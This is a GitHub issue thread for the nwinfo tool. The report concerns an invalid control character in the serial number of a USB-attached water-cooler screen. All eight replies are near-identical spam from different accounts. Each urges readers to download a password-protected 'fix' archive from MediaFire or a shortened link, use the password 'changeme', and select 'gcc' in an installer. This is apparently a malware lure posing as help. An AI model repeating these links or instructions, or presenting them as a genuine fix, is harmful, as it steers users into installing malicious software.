### ISSUE TITLE
Invalid characters in disk serial number

### ISSUE THREAD

**Issue by a1ive** [a1ive/nwinfo#50]
```
{
      "Path": "\\\\.\\PhysicalDrive2",
      "HWID": "USBSTOR\\DISK&VEN_USBLCD&PROD_USB_PRC_SYSTEM&REV_\\7&2B772394&0",
      "HW Name": "USBLCD USB PRC System USB Device",
      "Vendor ID": "USBLCD",
      "Product ID": "USB PRC System",
      "Serial Number": "\x1F",
      "Serial Number (Raw)": "\x1F",
      "Type": "USB",
      "Removable": "Yes",
      "Size": 0,
      "Partition Table": "MBR",
      "MBR Signature": "00 00 00 00",
      "Volumes": [
        {
          "Path": "\\Device\\HarddiskVolume9",
          "Volume GUID": "\\\\?\\Volume{8880b57b-612e-11ef-b9fb-806e6f6e6963}",
          "Volume Path Names": [
            {
              "Drive Letter": "U:\\"
            }
          ]
        }
      ]
    }
```
http://bbs.wuyou.net/forum.php?mod=redirect&goto=findpost&ptid=439906&pid=5386383
> This device is a water cooler with a screen produced by Thermalright (利民), the screen is connected to the motherboard via a USB cable and a virtual USB flash drive is set up to realize the communication between the host computer and the water cooled screen.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
